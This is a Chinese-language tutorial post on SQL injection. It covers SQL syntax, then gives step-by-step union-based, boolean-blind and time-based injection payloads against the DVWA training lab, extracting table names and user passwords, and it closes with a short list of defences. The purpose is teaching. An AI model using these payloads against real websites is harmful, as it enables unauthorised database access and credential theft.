【Web漏洞】SQL注入

SQL语句

什么是sql注入?

  • 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵,对于sql注入可以把它归为一句话:所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中,然后传递到sql服务器使其解析并执行的一种攻击手法。

sql注入的原理

  • 概述:针对SQL注入的攻击行为可描述为:在与用户交互的程序中(如web网页),非法用户通过可控参数注入SQL语法,将恶意sql语句输入拼接到原本设计好的SQL语句中,破坏原有SQL语法结构,执行了与原定计划不同的行为,达到程序编写时意料之外结果的攻击行为,其本质就是使用了字符串拼接方式构造sql语句,并且对于用户输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行,从而造成了sql注入

有关sql注入产生的条件

  • 程序编写者在处理程序和数据库交互时,使用了字符串拼接的方式构造SQL语句
  • 不安全的数据库配置,比如对查询集不合理处理,对sql查询语句错误时不当的处理,导致其错误信息暴露在前端
  • 过于信任用户在前端所输入的数值,没有过滤用户输入的恶意数据,且未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全

SQL查询语句

select
SELECT <目标列名序列> -- 需要哪些列
	FROM <表名> [JOIN <表名> ON <连接条件>] -- 来自哪些表
	[WHERE <行选择条件>] -- 根据什么条件
	[GROUP BY <分组依据列>]
	[HAVING <组选择条件>]
	[ORDER BY <排列依据列>]
SELECT * FROM Student
    SELECT 子句用于指定输出的字段
    FROM 子句用于指定数据的来源
    WHERE 子句用于指定数据的行选择条件
    GROUP BY 子句用于对检索到的记录进行分组
    HAVING 子句用于指定对分组后结果的选择条件
    ORDER BY 子句用于对查询的结果进行排序
WHERE :
查询条件谓词
比较=, >, >=, <=, <, <>, !=
确定范围BETWEEN … AND …, NOT BETWEEN … AND…
确定集合IN, NOT IN
字符匹配LIKE, NOT LIKE
空值IS NULL, IS NOT NULL
多重条件AND, OR
-- 1. 比较大小--------------------------------------------
SELECT Sname FROM Student WHERE Sdept='计算机系' SELECT Sno, Cno, Grade FROM SC WHERE Grade > 90

-- 2. 确定范围--------------------------------------------
SELECT Cname, Credit, Semester FROM Course WHERE Credit BETWEEN 2 AND 3
-- 等价于
WHERE Credit >= 2 AND Credit <=3

-- 3. 确定集合--------------------------------------------
-- 查询‘计算机系’和‘机电系’学生的学号、姓名和所在系
SELECT Sno, Sname, Sdept FROM Student WHERE Sdept IN ('计算机系', '机电系')

-- 4. 字符串匹配--------------------------------------------
SELECT Sno, Sname, Sdept FROM Student WHERE Sname LIKE '李%'

-- 5. 涉及空值的查询--------------------------------------------
-- 查询还没有考试的学生的学号、相应的课程号
SELECT Sno, Cno FROM SC WHERE Grade IS NULL

-- 6. 多重条件查询--------------------------------------------
-- 查询‘计算机系’有备注的学生的学好、姓名、所在系和备注
SELECT Sno, Sname, Sdept, Memo FROM Student
WHERE Memo IS NOT NULL AND Sdelt = '计算机系'
SQL常用聚合函数:
    COUNT(*):统计表中元组的个数
    COUNT([DISTINCT] <列名>):统计本列的列值个数,DISTINCT表示去掉重复值后再统计
    SUM(<列名>):计算列值的和值(必须是数值类型)
    AVG(<列名>):计算列值的平均值(必须是数值类型)
    MAX(<列名>):得到列的最大值
    MIN(<列名>):得到列的最小值
union、limit
  • 与关系代数中集合运算并、交和差对应的谓词,分别是UNION、INTERSECT、EXCEPT,当使用这些操作进行查询时,参与运算的两个查询需要分别用括号扩起来。
-- 查询‘计算机系’和‘机电系’的所有学生信息
(SELECT Sno, Sname, Ssex, Sdept
 FROM Student WHERE Sdept = '计算机系'
)
UNION
(SELECT Sno, Sname, Ssex, Sdept
 FROM Student WHERE Sdept = '机电系'
)

-- 查询同时选修了‘C01’与‘C02’课程的学生学号
(SELECT Sno FROM SC WHERE Cno='C01'
)
INTERSECT
(SELECT Sno FROM SC WHERE Cno='C02'
)

-- 查询选修了‘C01’但没选‘C02’课程的学生的学号
(SELECT Sno FROM SC WHERE Cno = 'C01'
)
EXCEPT
(SELECT Sno FROM SC WHERE Cno='C02'
)
LIMIT子句简介要检索查询返回的行的一部分,请使用LIMITOFFSET子句。 以下说明了这些子句的语法:
SELECT 
    column_list
FROM
    table1
ORDER BY column_list
LIMIT row_count OFFSET offset;
其他

函数

substr() 截取数据库某一列字段中的一部分。
database() 返回当前使用的数据库
group_concat()把一列的数据,全部整合到一起

information_schema数据库

COLUMNS 表

存储表中的列信息,包括表有多少列、每个列的类型等。SHOW COLUMNS FROM schemaname.tablename 命令从这个表获取结果。

mysql> SELECT * FROM COLUMNS LIMIT 2,5;
TABLES 表

存储数据库中的表信息(包括视图),包括表属于哪个数据库,表的类型、存储引擎、创建时间等信息。SHOW TABLES FROM XX; 命令从这个表获取结果。

mysql> SELECT * FROM TABLES;

SQL注入分类和步骤

步骤

1. 找注入点
2. 闭合语句
3. 注入攻击
4. 数据库名、表名、字段名

数字型与字符型注入

通过DVWA靶场来熟悉三种注入方式

https://cloud.tencent.com/developer/article/1922143
数字型:

url/auth.php?a=1 and 1=1# //正常
url/auth.php?a=1 and 1=2#  //错误

字符型:

url/auth.php?a=-1' or 1=1# //正常

联合查询注入

1.先用万能密码1‘ or 1=1#,简单判断是否存在注入

在这里插入图片描述

  • 联合查询相当于把别的表的数据查询结果显示到当前表,使用联合查询时,必须使得两张表的表结构一致,因此我们需要判断当前表的列数有多少列

2.闭合前面的单引号,构造联合注入语句,输入1'order by 1#,页面正常,然后输入1'order by 2 #,依次增加,直到3时出现错误,如图,说明当前表有2列

在这里插入图片描述

3.接下来构造联合查询语句确定显示的位置(SQL语句查询之后的回显位置)

1' union select 1,2#    

下图可以看出有2个回显

在这里插入图片描述

4.接着构造联合查询语句查询当前数据库用户和数据库名,结果会显示在上图对应的位置:'union select user(),database()#

在这里插入图片描述

5.使用information_schema来查询到所有的数据,查询当前数据库中的表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

在这里插入图片描述得出表名guestbook和users

6.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述

7.获得字段中的数据

1' union select user,password from users#

在这里插入图片描述

这里主要运用到了information_schema库, TABLES表里的table_name表名和COLUMNS的column_name字段名

在SQL注入中,我们重点关注的表有如下几个,因为主要的时候主要利用这几个表来获取数据:

  • SCHEMATA:提供了当前mysql数据库中所有数据库的信息,其中SCHEMA_NAME字段保存了所有的数据库名。show
    databases的结果取自此表。

  • TABLES:提供了关于数据库中的表的信息,详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息,其中table_name字段保存了所有列名信息,show tables from schemaname的结果取自此表。

  • COLUMNS:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息,其中column_name保存了所有的字段信息。show
    columns from schemaname.tablename的结果取自此表。

布尔盲注

  • 基于bool的盲注通常用函数
length(),返回长度
ascii(),返回ASCII值
substr(string,a,b),返回string以a开头,长度为b的字符串
count(column_name) 返回指定列的值的数目(NULL 不计入)

常用三种payload:

分别代表闭合语句和注释语句。注释有两种注释方法,#和--
1' and length(database())='1		
1' and length(database())=2#		
1' and length(database())=3-- 		

1.判断是字符型还是数值型,由下列判断得出是字符型

输入1显示存在

输入1 and 1=11 and 1=2均显示存在

输入1' and 1=1 #显示存在

输入1'and 1=2 #不存在

SQL源语句:

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

2.查数据库前要先判断数据库的长度
依次输入1' and length(database())=x #(x为大于等于1的整数)
当显示存在时即为数据库长度
发现当x=4时显示存在,故数据库长度为4

在这里插入图片描述
在这里插入图片描述

3.二分法找数据库名
依次输入1’ and ascii(substr(databse(),1,1))>或<字母的ascii值 # 通过比较输入字母的ascii值的显示正常与否来逐个确定库名

输入1' and ascii(substr(database(),1,1))>97 #
显示存在,说明数据库名的第一个字符的ascii值大于97(小写字母a的ascii值);
输入1' and ascii(substr(database(),1,1))<122 #
显示存在,说明数据库名的第一个字符的ascii值小于122(小写字母z的ascii值);
输入1' and ascii(substr(database(),1,1))<109 #
显示存在,说明数据库名的第一个字符的ascii值小于109(小写字母m的ascii值);
…

在这里插入图片描述在这里插入图片描述

重复上述步骤,就可以得到完整的数据库名dvwa

4.找数据库中的表
首先确定数据库中表的数量

1' and (select count (table_name) from information_schema.tables where table_schema=database())=x # 
(x为大于等于1的整数)当显示存在时即可判断表的数量
最终当x=2显示存在即表的数量为2

然后确定表的长度

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=x #
(x为大于等于1的整数)当显示存在时即可判断表的长度
当x=9显示存在即表的长度为9

然后同样二分法确定表名

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))><字母的ascii值 #
通过比较输入字母的ascii值的显示正常与否来逐个确定表名

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # 
显示存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # 
显示存在
…

重复上述步骤可得到出两个表名guestbook、users

5.找表中的字段
首先找到字段的数量

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=x #
当显示存在时即为字段数
最后当x=8时显示存在即字段数users字段数为8

然后找字段名

1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=x #
当x=7时显示存在即users表的第一个字段为7个字符长度

最后也是二分法确定字段名
字段名出来了,之后就是一个一个爆每个字段的值了

基于时间注入

1.时间盲注利用前提
  • 页面上没有显示位,也没有输出SQL语句执行错误信息。
    正确的SQL语句和错误的SQL语句返回页面都一样,但是加入sleep(5)条件之后,页面的返回速度明显慢了5秒。
2.时间盲注利用
该语句判断数据库个数,当数据库个数等于n页面返回延迟5if((select count(schema_name) from information_schema.schemata)=n,sleep(5),1)

该语句判断数据库内第一个数据库名有多少字符,字符个数等于n页面返回延迟5if((select length(schema_name) from information_schema.schemata limit 0,1)=n,sleep(5),1)

该语句判断第一个库第一个字符是什么,ascii值等于n页面返回延迟5if((select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)))=n,sleep(5),1)

相关函数学习

Length()函数 返回字符串的长度
substr()截取字符串
ascii()返回字符的ascii码
sleep(n):将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
count(column_name)函数返回指定列的值的数目(NULL 不计入)
  • 4
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
首先,我要强调一点:SQL注入攻击是非常危险的,可以导致数据泄露、系统瘫痪等严重后果。所以,在进行实验之前,请确保你正在使用的是测试环境而不是真实的生产环境。 下面是一个简单的实验,演示如何进行SQL注入攻击: 1. 准备工作 首先,需要准备一个测试环境。可以使用一些开源的Web应用程序,如DVWA (Damn Vulnerable Web Application) 或 bWAPP 等。这些应用程序都是专门设计用于测试和学习Web应用程序安全性的。 2. 确认存在漏洞 打开Web应用程序,尝试在输入框中输入一些SQL语句,看看是否可以成功执行。如果能执行,那么就说明这个应用程序存在SQL注入漏洞。 例如,在一个登录页面中,输入以下语句: ``` ' or 1=1-- ``` 如果能够登录成功,那么就说明存在SQL注入漏洞。这个语句的作用是将输入的用户名和密码均设置为1=1,这样就可以跳过正常的身份验证过程。 3. 获取数据 一旦确认存在SQL注入漏洞,就可以开始尝试获取数据了。下面是一个示例: 假设存在一个查询页面,可以根据输入的用户ID来查询用户的详细信息。在输入框中输入以下语句: ``` 1' or '1'='1 ``` 这个语句的作用是将查询条件设置为1=1,这样就会返回所有用户的详细信息。如果能够成功获取到数据,就说明攻击成功了。 4. 防范措施 为了防止SQL注入攻击,可以采取以下措施: - 使用参数化查询,而不是拼接SQL语句 - 对用户输入的数据进行严格的验证和过滤,防止恶意输入 - 限制数据库用户的权限,不要使用具有过高权限的账户连接数据库 总之,SQL注入攻击是一种非常危险的攻击方式,需要我们时刻保持警惕,并采取相应的防范措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值